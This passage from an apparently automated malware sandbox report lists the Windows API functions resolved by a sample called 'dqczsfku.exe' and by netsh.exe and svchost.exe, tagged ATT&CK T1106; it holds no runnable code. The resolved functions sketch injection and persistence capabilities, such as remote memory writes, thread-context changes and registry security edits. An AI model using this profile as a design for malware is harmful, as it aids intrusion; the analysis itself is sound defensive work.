\"GetProcAddress\" with a parameter ImmEscapeW (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringA (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringW (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionWindow (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter ImmGetContext (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter ImmGetDefaultIMEWnd (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter ImmIsIME (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter ImmReleaseContext (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter ImmRegisterClient (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontW (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontA (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontW (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontA (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionWindow (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter ImmNotifyIME (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter ImmLockIMC (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter ImmUnlockIMC (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter ImmLoadIME (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter ImmSetOpenStatus (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter ImmFreeLayout (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter ImmActivateLayout (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter ImmGetCandidateWindow (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter ImmSetCandidateWindow (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter ImmConfigureIMEW (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter ImmGetConversionStatus (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter ImmSetConversionStatus (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter ImmSetStatusWindowPos (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter ImmGetImeInfoEx (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter ImmLockImeDpi (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter ImmUnlockImeDpi (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter ImmGetOpenStatus (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter ImmSetActiveContext (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter ImmTranslateMessage (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter ImmLoadLayout (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter ImmProcessKey (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter ImmPutImeMenuItemsIntoMappedFile (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter ImmGetProperty (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringA (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringW (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter ImmEnumInputContext (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter ImmSystemHandler (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter CtfImmTIMActivate (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter CtfImmRestoreToolbarWnd (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter CtfImmHideToolbarWnd (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter CtfImmDispatchDefImeMessage (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter CtfImmNotify (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter CtfImmSetDefaultRemoteKeyboardLayout (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter CtfImmGetCompatibleKeyboardLayout (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter LpkTabbedTextOut (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter LpkPSMTextOut (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter LpkDrawTextEx (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter GlobalAlloc (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter GetLastError (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter Sleep (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter VirtualAlloc (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter CreateToolhelp32Snapshot (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter Module32First (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter CloseHandle (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter LoadLibraryA (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter VirtualProtect (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter VirtualFree (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter GetVersionExA (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter TerminateProcess (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter ExitProcess (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter SetErrorMode (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter StackWalk64 (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter GetVolumeInformationA (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter GetComputerNameA (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter GetTickCount (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcess (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleA (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter GetSystemInfo (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter lstrcmpiA (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter lstrlenA (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter lstrcpynA (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter InterlockedExchange (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter GetCurrentThreadId (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter GetOverlappedResult (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter WaitForSingleObject (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter WriteFile (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter ReadFile (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter CreateFileA (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter DisconnectNamedPipe (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter ConnectNamedPipe (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter CreateNamedPipeA (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter GetEnvironmentVariableA (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter DeleteFileA (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter IsBadWritePtr (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter IsBadCodePtr (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter lstrcpyA (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter lstrcmpA (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter IsBadReadPtr (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter WriteProcessMemory (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter VirtualAllocEx (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter SetFilePointer (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter GetFileSize (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter SetFileAttributesA (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter GetDiskFreeSpaceA (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter GetWindowsDirectoryA (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter GetProcAddress (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter LocalFree (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter GetFileAttributesExA (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter LocalAlloc (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter CreateProcessA (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter GetTempPathA (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter SystemTimeToFileTime (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter GetSystemTime (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter DeviceIoControl (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter CreateFileW (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter GetModuleFileNameA (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter ResumeThread (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter SetThreadContext (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter GetThreadContext (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter lstrcatA (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter CreateThread (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter GetDriveTypeA (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter GetCommandLineA (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter SetUnhandledExceptionFilter (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter InterlockedIncrement (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter GetLocalTime (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter GetTimeZoneInformation (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter FileTimeToLocalFileTime (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter FileTimeToSystemTime (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter InterlockedDecrement (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter HeapSize (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter GetSystemTimeAsFileTime (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter MultiByteToWideChar (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter lstrlenW (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter GetStartupInfoW (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter GetProcessHeap (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter HeapAlloc (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter HeapReAlloc (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter HeapFree (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter FreeLibrary (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter CreateEventA (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter GetSystemDirectoryA (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter wsprintfA (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter CharToOemA (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidA (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter CreateProcessWithLogonW (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExA (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter StartServiceCtrlDispatcherA (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter RegisterServiceCtrlHandlerA (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter SetServiceStatus (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter RegDeleteValueA (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter RegGetKeySecurity (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter RegSetKeySecurity (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter RegSetValueExA (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter GetLengthSid (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter GetFileSecurityA (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter GetSecurityDescriptorOwner (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter InitializeSecurityDescriptor (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorOwner (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter SetFileSecurityA (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter GetSecurityDescriptorDacl (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter GetAce (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter DeleteAce (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorDacl (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyA (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter RegEnumValueA (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter GetUserNameW (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameW (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameA (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter GetUserNameA (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter CheckTokenMembership (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter ShellExecuteA (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter ShellExecuteExW (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter atexit (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter GetSystemWow64DirectoryA (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00005212)\n \"dqczsfku.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameLocalW (UID: 00000000-00005212)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005184)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter InitHelperDll (UID: 00000000-00005184)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00005184)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CoInitializeEx (UID: 00000000-00005184)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00005184)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00005184)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CryptEnumProvidersW (UID: 00000000-00005184)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter LoadStringW (UID: 00000000-00005184)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExW (UID: 00000000-00005184)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00005184)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00005184)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter OpenSCManagerW (UID: 00000000-00005184)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter OpenServiceW (UID: 00000000-00005184)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter QueryServiceConfigW (UID: 00000000-00005184)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CloseServiceHandle (UID: 00000000-00005184)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter QueryServiceStatus (UID: 00000000-00005184)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegQueryInfoKeyW (UID: 00000000-00005184)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyExW (UID: 00000000-00005184)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00005184)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter LookupAccountSidLocalW (UID: 00000000-00005184)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00005184)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00005184)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00005184)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00005184)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00005184)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00005184)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SystemFunction036 (UID: 00000000-00005184)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter HttpInitialize (UID: 00000000-00005184)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegisterGPNotification (UID: 00000000-00005184)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter UnregisterGPNotification (UID: 00000000-00005184)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetHashInterface (UID: 00000000-00005184)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetCipherInterface (UID: 00000000-00005184)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SetThreadUILanguage (UID: 00000000-00005184)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CoUninitialize (UID: 00000000-00005184)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter HttpTerminate (UID: 00000000-00005184)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005184)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00002988)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetAdaptersAddresses (UID: 00000000-00002988)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ConvertStringSecurityDescriptorToSecurityDescriptorW (UID: 00000000-00002988)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetUserNameExA (UID: 00000000-00002988)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameLocalA (UID: 00000000-00002988)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter DnsQuery_A (UID: 00000000-00002988)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"15001600c03e3e6b@ADVAPI32.dll\"\n \"0e000f00703f3e6b@ADVAPI32.dll\"\n \"0e000f00cc3f3e6b@ADVAPI32.dll\"\n \"11001200b4473e6b@ADVAPI32.dll\"\n \"1100120048483e6b@ADVAPI32.dll\"\n \"120013008c483e6b@ADVAPI32.dll\"\n \"12001300e4483e6b@ADVAPI32.dll\"\n \"14001500dc6f3e6b@ADVAPI32.dll\"\n \"14001500f46f3e6b@ADVAPI32.dll\"\n \"140015000c703e6b@ADVAPI32.dll\"\n \"1700180024703e6b@ADVAPI32.dll\"\n \"0d000e003c703e6b@ADVAPI32.dll\"\n \"110012004c703e6b@ADVAPI32.dll\"\n \"1100120060703e6b@ADVAPI32.dll\"\n \"0d000e0034493e6b@SHELL32.dll\"\n \"0d000e00b0493e6b@SHELL32.dll\"\n \"0f001000a0713e6b@ADVAPI32.dll\"\n \"14001500e0713e6b@ADVAPI32.dll\"\n \"14001500f8713e6b@ADVAPI32.dll\"\n \"0c000d0040723e6b@ADVAPI32.dll\"\n \"0c000d0050723e6b@ADVAPI32.dll\"\n \"0e000f0060723e6b@ADVAPI32.dll\"\n \"0e000f0070723e6b@ADVAPI32.dll\"\n \"0b000c0080723e6b@ADVAPI32.dll\"\n \"14001500b4733e6b@SETUPAPI.dll\"", 